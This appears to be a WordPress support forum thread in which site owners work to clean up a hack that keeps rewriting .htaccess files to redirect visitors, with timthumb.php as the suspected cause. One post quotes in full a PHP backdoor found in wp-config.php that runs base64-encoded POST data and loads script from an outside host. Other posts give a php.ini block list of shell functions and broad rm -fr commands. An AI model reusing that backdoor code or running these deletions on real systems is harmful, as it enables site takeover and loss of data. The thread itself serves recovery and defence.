LOL, maybe my guardian angel fixed mine for me. I find it extremely weird that my solution didn't work for anyone else.
3.3.1 Hacked by saveprefs.ru redirect (91 posts)
-
impackt
Posted 4 months ago # -
UrbaanAlmelo
Posted 4 months ago #@jamieedwards Yeah, I looked for it, but it's not on my server.
-
Posted 4 months ago #@impackt Can I borrow your guardian angel, just for a night?
-
Posted 4 months ago #I'm pretty sure by now that it's not an issue that I myself can resolve. In my FTP client I saw this popping up:
[22:45:36] 211-Status of .htaccess: [22:45:36] -r--r--r-- 1 henkleurinknl psacln 3519 Jan 17 21:34 .htaccesshenkleurinknl and psacln being websites of two other people - unfamiliar to me - who, not surprisingly, have also been compromised.
The problem seems to be lying somewhere else. Which does nót comfort me.
-
jamieedwards
Posted 4 months ago #Hmmmm, after my last post i am not convinced... Patched timthumb.php, deleted all .htaccess files, and 20 minutes later they are all back :(
-
Tehranshahr
Posted 4 months ago #I have 3 1and1 accounts but one of them only have this problem, maybe the server is infected?
The server ip address is 50.21.189.85, are you on the same server?
-
Old_fart
Posted 4 months ago #@pkwooster On FreeBSD based hosting there is OS utility
mtree
that can calculate and later compare hash of any directories/files. Linux based OS need third party application called tripwire that do the same. Ask provider what they have. It is better than plugin because those programs has system wide permissions 555 and can be hacked only if attacker gain root privilege.
@jamieedwards, malicious script automatically search everywhere beginning from root directory. Take a look what kind of information was taken:
[Code moderated as per the Forum Rules. Please use the pastebin]
if you restrict in php.ini dangerous functions(and did restart HTTP server after that) and you still continue have problem - try to delete everything in /tmp like that rm -fr /tmp/*. Some system may allow you read/write access to /var/tmp so delete everything from there too. If you know other places where you have write permissions take a look on that places too.
-
Posted 4 months ago #look for an _cache.php file. The security guy said that was where all the .htaccess files were coming from. Mine was in /wp-content/uploads.
I have just deleted this file, now i will remove the .htaccess files again and wait 30 minutes to see if that in fact got rid of the problem :/
I'll keep you posted as I work on it.
-
Posted 4 months ago #@Tehranshahr, no I seem to be on a different 1and1 server. All my sites are pinging to 74.208.210.66
-
Posted 4 months ago #Don't wanna spoil the fun, but there's no _cache.php on my server.
-
Posted 4 months ago #@jamieedwards
Ok, but seems the problem is from the server, i'm testing a way to make sure that this problem is from the server, i'll post the result tomorrow. -
Posted 4 months ago #Ok, so it's been over an hour and a half now and it looks like I don't have any more infected .htaccess files showing up. There were a bunch of files that the security guy at 1and1 found that were corrupted, timthumb.php files that were in places I didn't know about such as some plugin folders, and also all of my /wp-includes/js/plupload/plupload.html4.js seemed to have been compromised on each of my sites. I deleted these files, and the _cache.php file (one of the files used to create the bogus .htaccess files), and also a whole bunch of random numbered files that were in a /wp-content/themes/mytheme/temp folder, one of them was called 7a7f9c188164e70ad99de9734ad7b524.php for instance, but they are all random numbers. I tell you all of this but that wouldn't have stopped anything unless he shut down the shell sessions first otherwise the connection to my files was still open, and they could have just uploaded more files. So you will need to do this, or get someone at your hosting company to do it for you.
Now I am off to change all of my admin passwords once again just in case!
Blessings to all of you, I pray you all get the solutions you need to get your sites back up and running quickly.
Jamie -
wpv-expert
Posted 4 months ago #Hello Everyone,
Hacks by their very nature are insidious and cannot be second guessed in any way.
I have seen code embedded in .gif files that were then extracted using base 64 to run the code pulled from the .gif file. How crazy is that?
Here is the best way to fix issues for a hack that does not seem to have a particular clean cut resolution that anyone can follow. For your own sanity this is the most reliable way to be absolutely sure your hack is gone.
You will need to ask your Host to open a new account and apply whatever money is left for hosting of the current (hacked) account to the new account.
STEP 1
Perform a new install of WordPress (latest version).STEP 2
Make sure all re-installed plugins are freshly downloaded from their source and compatible with the latest version of WordPress.STEP 3
Export your database from WordPress using the xml database export tool from WordPress.STEP 4
Download all image content to your local drive to FTP up to the new account later.STEP 5
Make sure you recreate all folders you may have had in the old site in the new site. Put all content in it's respective place. Take extensive notes for each plugin as to their configuration, as well as all WordPress specific settings, i.e. anything you need to know before leaving the old site behind. Be very methodical in this step otherwise you will create more work for yourself.STEP 6
Import your database (previously exported) into the new WordPress site.
Put all image content where it goes in it's respective location/folders.If you made accurate notes and copied everything down from the old site, it will be nothing more than a logistical exercise.
FINAL NOTE:
Always make your website as secure as you can with best practices.
Long passwords . . . changed every 6 months without fail. Including your FTP account p/w's.Install the Login lockdown plugin, WSD Security plugin and follow their instructions.
Never leave the Default "Admin" account in place. Always create a new "Admin" account with the name Admin. Better yet do not use any word in any language for the user name. Make your User name and password 25 characters in length using all valid upper lower case as well as special characters accepted by WordPress.
You are now equipped to weather the storm, and keep those passwords rotated out every six months if you have to schedule software to remind you to.
Granted this is not fun if you have many sites like many people but it does work.
-
mastercom
Posted 4 months ago #Hello there,
I have the same issue and I am trying everything since 2 days now but whatever I do the .htaccess files are rewritten :-(
I can't localize the infected files in my wp-content... Do you have any tips to find them?
thanks
-
p-mt
Posted 4 months ago #Hello,
since yesterday night, unfortunatelly, I again found activities on my server. Again several w????????w.php scripts (e. g.: w77688816w.php) are coming up. In addition, I found a script sm5ek3.php (http://pastebin.com/rekKbXJb), which probably is the one described here: http://www.webhackblog.com/2011/10/31/sm3-php-spam-script/
I now decided, to be more radical. Steps I have done:
- I delete all older content, which is not needed any more in DocumentRoot (made a backup before that with tar)
- make backup on all plugins (tar)
- delete all plugins (plan is, to reinstall the needed one later)
- delete all older themes (I only take the new ones, coming with the fresh wordpress installation)
- I followed old_fart recommendation to disable functions in php
--- old-fart recommendation ---
1. locate your php.ini file
2. replace there
disable_functions =
to
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"
3. force to restart http server
---- find and afterwards delete malware files by ...
- ... find . -name sm*.php -print
- ... find . -name "w?????????.php" -print- delete all .htaccess files with > find . -name ".htaccess" -exec rm {} \;
- recreate my wp-config.php from scratch!!!!
In the old one, I found this code, which probably isn't anything, I like to have. Maybe, this is the backdoor??:
"<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
" -
Posted 4 months ago #the above code is explained here: http://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does
This code is present also in most of the php-files of my theme!! I have to clean this up!
-
Posted 4 months ago #with
sudo grep -r turnitupnow * > badfiles.txtI found A LOT more of this!
-
Peter Wooster
Posted 4 months ago #One additional step to add to @wpv-expert's post:
Be sure to check your development system for malware. One of the easiest entry points for this is a compromised Windows system. Key loggers and other similar malware allow the hacker to steal your FTP password.
Never use a Windows PC for both casual surfing using IE and FTP to production sites. It's better to have an intermediary machine running Linux that you save your code to, test it and then upload it to the production server.
/peter
-
Posted 4 months ago #Looks like my problem was caused by another domain on the same server, that got hacked. Simply chmodding my root folder did the trick...
It's always the hardest when a simple solution is right in front of you...
-
bizarotrips
Posted 4 months ago #Another one hacked with the same bad thing here :( 5 WordPress installations on one shared hosting account (iPage).
2 days since I'm looking for solution to this nasty hack.
After reading many posts in various places and trying to find a solution finally I think I managed to stop the .htaccess rewrite thing to happen every half an hour or so. This is what I did:1. The first thing I did was to download all my files from the server in a backup dir on my pc and to make database backups of the 5 WordPress installations on my server. There were 30000+ files, but it was worth the downloading.
2. Next I ran a file search on my backup dir for the "_cache.php" file mentioned in many posts I read. It was found in only one WordPress installation in "/wp-content/uploads". I deleted it from the server.
p.s. First I was using a basic FTP connection, but now I switched my settings to SFTP. I changed my password before that with a really strong one :) as it was mentioned that this attacks may be so successful due to weak FTP passwords.3. The next thing I did was to file search the backup dir for all "timthumb.php" instances. There were many in themes also in plugins (ubermenu, featured posts with thumbnails etc...).
4. I deleted all unused themes and plugins and all instances of "timthumb.php".
5. Reinstalled all 5 WordPress installations with fresh ones with the auto reinstall fron the admin update menu.
6. Deleted all ".htaccess" files from the five sites and replace them with fresh ones and chmod them to 444 (as "Tehranshahr" suggested here). I also included the 404 redirect code the user "impact" posted earlier here.
Now it's been more than an hour and a half and the ".htaccess" rewrite thing seems to be stopped. I'm praying that this is it for now.
-
j0hnnyb0y
Posted 4 months ago #bizarotrips, which version of wordpress are you using? which plugins do you have installed?
I work as a malware analyst and most WordPress hacks that I have seen are due to vulnerabilities within third-party plugins.
One particular instance the user had installed a plugin (latest version), but it hadn't been updated by the developer in months even after the vulnerability had been posted all over the net. :(
Go over what you have installed, and search the net to determing if there are any exploits published for the plugins that you use.
Also check out Better WP. It works pretty good, when it comes to utilizing best practices in regards to WP security.
-
Posted 4 months ago #This was just brought to my attention...
If you are at your whits end trying to get your site back on track, these guys will do it for like 100 bucks or something like that.
-
Posted 4 months ago #UPDATE: My sites are up an running Ok without any redirection in the ".htaccess" files since my last post. I'm almost sure that in my case it was the "timthumb.php" exploit used. @j0hnnyb0y all my WP installs are 3.3.1
About the plugins... it's more complicated thing, because I've installed so many plugins on one of my sites for research purposes that it's very hard for me to find out which one of them may caused this vulnerability. As I posted before I've downloaded all the files from my server directory (just 5 WordPress installs - 30000+ files)so I will have the time to check everything that could cause this s**t.
I'm pretty sure that many of my files still contain some unwanted scripts injected so I'm gonna investigate that further.p.s. the "http://sitecheck.sucuri.net" still gives me a warnings for some of the files in my WP installs... One of them is "init2.php" which was in one of my thumbnail's directories. This I connect again with the "timthumb.php" thing.
-
Posted 4 months ago #I am now using this WP plugin "TimThumb Vulnerability Scanner" By Peter Butler on any new site or plugin I install. Seems to work ok, not sure it is updating the script properly, but at least it identifies any timthumbs that are out of date and not secure and I can update them manually.
-
roro
Posted 4 months ago #I was hacked too, they created 4 folders: lastnews, newsjournal, curretevents and breakingnews, each one with 100 names, each one with one .htaccess that redirected to a Russian site.
Then send thousands of spam mails linking to that files. The only script I have on that domain is wordpress!
I deleted the folders but they appeared later, so now I leave the folders there but I changed the permission so no one can access them.
But I still worried, my server provider wants to know what happened, and I really dont know.
-
Posted 4 months ago #@roro what's your domain?
-
Mr BaDr
Posted 4 months ago #he,
where is the probnlem now, in the timthumb.php or in wp 3.3.1 ??
thanks. -
Posted 4 months ago #Mr Badr, for me it was timthumb.php, and not 3.3.1. There is a plugin that I suggest you use called "TimThumb Vulnerability Scanner" By Peter Butler. It will scan all your files and tell you if you have a timthumb script that is open to attack.
All the best,
Jamie -
Roy
Posted 4 months ago #This timthumb hack caused havoc about half a year ago. Apparently they found a new vulnerability or all of you didn't switch to better coded plugins after that havoc.
http://wpcandy.com/reports/timthumb-security-vulnerability-discovered
Badr, the last time there was a largely exploited of WordPress itself has been years back. When you make sure always to have the latest WP, the things to look at for security are plugins, server settings, passwords, etc.
-
Posted 3 months ago #@p-mt, sorry for late response, was busy last week ...
sudo grep -r turnitupnow * > badfiles.txt
is good, but...
Do you know that:
1. PHP can be easily embedded in gif, jpg, png, mp3, wav... ?
2. A lot of plugins after unpacking has executable rights on gif, jpg, png, txt files, which can be executed as CGI in this case?
Always cure them with help of
find ./ -type d -exec chmod -vv 755 {} \; find ./ -type f -exec chmod -vv 644 {} \;3. Bunch of installations has 777 permissions on all wp-content folder instead of restricting it to "upload" only? (The best choice would be to remove ANY writable by HTTP server folders outside DOCUMENT_ROOT as it possible to do with other CMS, but changing it in the WordPress it's a challenge)
4. Almost any HTTP server allows write permissions to /tmp which is most loveable place for any backdoors?
5. Most servers have bash, gawk... base utilities which can be called by anyone and can be easily used as backdoor channel,(so no need to keep anything on servers cuz it always available :) ) any trace of activity will be logged on hosting?Well there is a lot of scary things that out of your control if you dont run your own server. Hackers rarely infect systems in old fashion way. They usually keeps spare ways to reactivate itself after their visible stuff was detected and deleted. Spare ways could be anywhere, in database triggers, inside images or mp3 files(that actually always exposed by WordPress to the world)...etc
To be sure that you care at least your parts of software, check ALL your files that exposed by HTTP server with this simple commands(change directory to the ROOT of HTTP accessible aka DOCUMENT_ROOT):
# Check if some files trying to obfuscate itself find . | xargs grep -i base64 > ../000-obfuscation.txt# Check for links to external sites # Especially pay attention if it is in php files find . | xargs grep '\<:alpha:*://[^/]*'> ../001-external_links_in_urls.txt# Review potentially malicious content find . | xargs grep -Ei 'iframe|src|javascript:|eval|include' > ../002-active_content.txt# Delete anything in temporary folder that was created by your # account. (Dont worry that you may delete others files, # /tmp has a stiky bit set on most servers, so you can not delete # files that was created by others) rm -fr /tmp/* ;Dump MySQL database so it will be possible to parse it as a single text file and search for the same keywords inside it.
Well, there no universal advises because of different environments on servers and situation heavily depended on what type of plugins/themes do you use(BTW, don't keep deactivated plugins/themes since it still callable from outside and if one find a hole he/she will able to use it)
Best regards,
Alex
Reply »
You must log in to post.
